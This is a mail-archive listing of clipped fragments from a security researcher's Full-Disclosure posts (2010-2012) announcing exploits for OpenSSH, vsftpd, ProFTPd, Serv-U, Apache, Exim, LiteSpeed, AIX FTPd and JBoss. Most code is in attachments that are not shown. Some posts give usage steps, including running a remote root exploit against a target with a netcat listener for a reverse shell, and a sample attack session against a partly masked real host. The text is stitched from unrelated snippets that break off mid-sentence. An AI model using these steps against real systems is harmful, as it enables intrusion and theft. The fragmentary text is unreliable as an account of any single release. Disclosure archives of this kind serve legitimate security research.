Hello lists,
you can view my slides notes for my talk entitled Uncovering
Zero-Days and advanced fuzzing held at AthCon 2012 at the following
places:
http://www.isowarez.de/
http://kingcope.wordpress.com/
Cheerio,
/Kingcope
___
Full-Disclosure -
Everything reachable has been reached - Mission accomplished.
There won't be any public releases going by the nickname KingCope in
the future.
I have one last present for you.
http://www.youtube.com/watch?v=-mgf7dqg7zM
( My Secrets Inside (tm) )
/Kingcope
, to the shame files...
On 18 January 2012 08:11, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Demonstration of the Exploit:
http://www.youtube.com/watch?v=78nAxh70yZE (thanks ClsHack)
see attached content
/Kingcope
___
Full
On 20 January 2012 00:28, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Hello xD,
sorry I don't understand a word you are talking about.
To put everything together about what you were ranting would take too
much time for me.
Did I offend you in any way ?
It's just a PoC
Demonstration of the Exploit:
http://www.youtube.com/watch?v=78nAxh70yZE (thanks ClsHack)
see attached content
/Kingcope
/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
**
my iPhone
On Jan 17, 2012, at 4:11 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Demonstration of the Exploit:
http://www.youtube.com/watch?v=78nAxh70yZE (thanks ClsHack)
see attached content
/Kingcope
undeadattack.c
___
Full
Hi Chris,
Am 14. Dezember 2011 08:21 schrieb Chris Evans scarybea...@gmail.com:
On Tue, Dec 13, 2011 at 12:11 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
Yes you are somewhat right, as this is the old discussion about if
code execution inside an ftpd
is a vulnerability
Hi,
I read through your blog post with much excitement as it seems you got
your way through
to a stable way to exploit this vulnerability, congrats to that.
Apart from the discussion on how to exploit the heap overrun I just
want to mention that
to exploit this bug in vsftpd you have to break the
-disclosure] VSFTPD Remote Heap Overrun (low severity)
An: HI-TECH . isowarez.isowarez.isowa...@googlemail.com,
dwa...@redhat.com, jo...@grok.org
Cc: full-disclosure@lists.grok.org.uk
Hi Ramon,
Frankly I didn't look into the possibility to exploit this
vulnerability,
so i do not know if it is easy
-- Weitergeleitete Nachricht --
Von: HI-TECH . isowarez.isowarez.isowa...@googlemail.com
Datum: 10. Dezember 2011 00:44
Betreff: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)
An: Ramon de C Valle rcva...@redhat.com
Hi Ramon,
Frankly I didn't look
This is afaik a patched CVE in Linux glibc [1] which can be triggered through
the very secure ftp daemon [2] so it will only work on older linux distros.
Be aware that vsftpd has privilege seperation built in so this bug
will not yield a root shell.
It could yield root only in junction with a
Hi lists,
this is Kingcope
btw this exploit does not depend on the ProFTPd version
as illustrated in the youtube video below it will unlock
ProFTPd 1.3.4a too.
enjoy the hacktro!!
http://youtu.be/10uedlgNEJA
___
Full-Disclosure - We believe in it.
I m better than TESO!
CONFIDENTIAL SOURCE MATERIALS!
[*][*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*][*]
Affected:
220 Serv-U FTP Server
Hi lists,
sorry if I offended anyone with by referring to teso,
I really like teso as you might also.
all this happend because I was drunk hehe :
I hope you enjoy this release!
Am 30. November 2011 20:32 schrieb HI-TECH .
isowarez.isowarez.isowa...@googlemail.com:
/* KCOPE2011 - x86/amd64 bsd
24405398b27585676f0191b493839e9c02f3ec5a file1
e676c17b21f5a96fe278c0cdb32152357d5e10f6 file2
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Hello Lists,
the youtube video at the bottom illustrates the threat quite good.
these where the exact same observations I had when initially running the tool.
It has to be noted that a good architecture can very likely mitigate the risks.
For example load balancing to multiple targets will most
Hi Michal,
What do you think from where this originated ?
Was you outlining it a while back :)
/kc
2011/8/24 Michal Zalewski lcam...@coredump.cx:
http://www.gossamer-threads.com/lists/apache/dev/401638
FWIW, I pointed out the DoS-iness of their Range handling a while ago:
the advisory
there was a patch for both Apache and IIS by limiting the maximal Byte Range
headers slightly. This is a feeling I got over years of fuzzing for httpd bugs.
Regards,
Kingcope
2011/8/24 HI-TECH . isowarez.isowarez.isowa...@googlemail.com:
Hi Michal,
What do you think from where
Yeah you are correct. It does not really matter.
It's just a DoS things should move on.
I do that for fun, seeing things break, not more not less,
the hype on the media right now makes no difference, but
I must admit listening to Johannes Ullrich in the daily stormcast reporting
about the postings
Hello list,
oops looks like this bug has nothing to do with mod_deflate/mod_gzip,
read on here where the apache team is resolving the issue:
http://www.gossamer-threads.com/lists/apache/dev/401638
Cheers,
Kingcope
2011/8/20 Moritz Naumann secur...@moritz-naumann.com:
On 20.08.2011 00:23 HI
w00t for the youtube video and nice tune too :
2011/8/20 HI-TECH . isowarez.isowarez.isowa...@googlemail.com:
Disabling mod_gzip/mod_deflate is a workaround I guess.
2011/8/20 Moritz Naumann secur...@moritz-naumann.com:
On 20.08.2011 00:23 HI-TECH . wrote:
(see attachment)
/Kingcope
Works
Disabling mod_gzip/mod_deflate is a workaround I guess.
2011/8/20 Moritz Naumann secur...@moritz-naumann.com:
On 20.08.2011 00:23 HI-TECH . wrote:
(see attachment)
/Kingcope
Works (too) well here. Are there any workarounds other than rate
limiting or detecting + dropping the traffic IPS
(see attachment)
/Kingcope
killapache.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z yourip target
setup a netcat, port 443 on yourip first
a statically linked linux binary of the exploit can be found below
you can apply the patch using the diff if you don't want to run that.
2011/7/1 Benji m...@b3nji.com:
So you want people to download your statically linked binary?
On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
OpenSSH FreeBSD Remote Root Exploit
(see attachment)
Cheers,
Kingcope
ssh_preauth_freebsd
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
this
kind of attack to fail. In any way looking at real environments this kind
of attack WILL succeed, not everywhere sure but thats thats not what I
was stating
in the advisory.
-kc
2011/6/19 Moritz Naumann secur...@moritz-naumann.com:
On 19.06.2011 13:35 HI-TECH . wrote:
A good and working example
?showComment=1308462489303#c952957474393688505
On Sun, 19 Jun 2011 02:58:16 +0200, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
This technique describes how to exploit apps which encode pictures
during a
Php upload. Embedding Php code inside gif files which are uploaded is a
known
I said be careful what you wish for cause you just might get it, and if you
get it then you just might not know what to do with it cause it might just
come back on you tenfold. -kc
___
Full-Disclosure - We believe in it.
Charter:
This technique describes how to exploit apps which encode pictures during a
Php upload. Embedding Php code inside gif files which are uploaded is a
known technique to execute arbitrary code on a Apache Php installation. Now
what can one do when the code which uploads the file processes and encodes
This is a perl port of the metasploit module by Patrick Hof (redteam-pentesting)
# Exploit Title: JBoss Application Server Remote Exploit
# Date: March 2011
# Author: Kingcope
# Version: 4.* 5.*
# Tested on: Linux / Windows
# CVE : CVE-2010-0738
This email was sent from an internet cafe :
MacOS X FTP Server 0day
it was my finding, who carez
ftp target
get ...tar
will retrieve all contents of underlying folder of user ftp. (hint:
works with correct user account in latest NcFTPD too)
ftp ls ~ftp
200 PORT command successful.
150 Opening ASCII mode data connection for /us.
/*FreeBSD = 5.4-RELEASE ftpd (Version 6.00LS) sendfile kernel mem-leak
by Kingcope
February 2011
--
kernel memory file may contain secret hashes and more..
tested on FreeBSD 5.3-RELEASE
reference: FreeBSD-SA-05:02.sendfile
*/
/Kingcope
/*FreeBSD = 5.4-RELEASE ftpd (Version 6.00LS) sendfile
# Exploit Title: FreeBSD local denial of service - forced reboot
# Date: 28. January 2011
# Author: Kingcope
# Software Link: http://www.freebsd.org
# Operating System: FreeBSD
# Tested on: 8.0-RELEASE
This source code when compiled and executed
will reboot at least FreeBSD 8.0-RELEASE because of
Phrack and the blackhats.
You are an army I am one.
The only lasting.
I am your conscience.
I am always behind you,
every day from morning to late,
I am near you
no matter
where you go
I'm the bad feeling
that you get the one or the other day.
And you without difficulty
Simply push aside
On
See attached exploit,
Kingcope
SimpleClient.java
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
(see attachment)
signed,
Kingcope
eximxpl.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
New version drops into root.
The prior version was broken.
(see attachment)
signed,
Kingcope
eximxpl.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard
(see attachment)
signed,
Kingcope
proremote.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
care about a DOS.
On Fri, Oct 1, 2010 at 10:23 AM, Jacky Jack jacksonsmth...@gmail.com wrote:
Are you trying to Pwn$ G33ks here?
On Fri, Oct 1, 2010 at 8:41 AM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
vulnerability description is attached to this email
Since it's public now I attached the original exploit with original headers.
Greetings,
Kingcope
2010/8/19 HI-TECH . isowarez.isowarez.isowa...@googlemail.com
Watch the Hacktro at
http://www.youtube.com/watch?v=uavlQV2FTjU
Cheers,
Kingcope
freebsd-cache.c
Description: Binary data
Watch the Hacktro at
http://www.youtube.com/watch?v=uavlQV2FTjU
Cheers,
Kingcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Hello List,
sry ppl - it needed some fixes and the exploit is now much more stable.
(see attachment)
Best Regards,
Kingcope
aix.c
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter:
.
Cheers!
Kingcope
2010/7/18 HI-TECH . isowarez.isowarez.isowa...@googlemail.com
(SEE ATTACHMENT)
---
Bad luck wind been blowin' on my back
I was born to bring trouble wherever I'm at
With the number '13' tattooed on my neck
That ink starts to itch
Black gon' turn to red
I was born
Attached is another version of my AIX 5l FTPd exploit written in C to be
more portable powerful between hosts :
The Exploit in action:
[r...@vs2067037 kcope]# ./aix -h ftp.ABABABABABA.edu -i 85.25.67.37 -c
jkateley
220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.
(SEE ATTACHMENT)
---
Bad luck wind been blowin' on my back
I was born to bring trouble wherever I'm at
With the number '13' tattooed on my neck
That ink starts to itch
Black gon' turn to red
I was born in the soul of misery
And I never had me a name
They just give me a number when I was young
Litespeed Technologies Web Server Remote Poison null byte Zero-Day
discovered and exploited by Kingcope in June 2010
google gives me over 9million hits
Example exploit session:
%nc 192.168.2.19 80
HEAD / HTTP/1.0
HTTP/1.0 200 OK
Date: Sun, 13 Jun 2010 00:10:38 GMT
Server: LiteSpeed
f3838b30c0aaf8aea00ccb19ad96947eba413d7a c.pl
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
49 matches
Mail list logo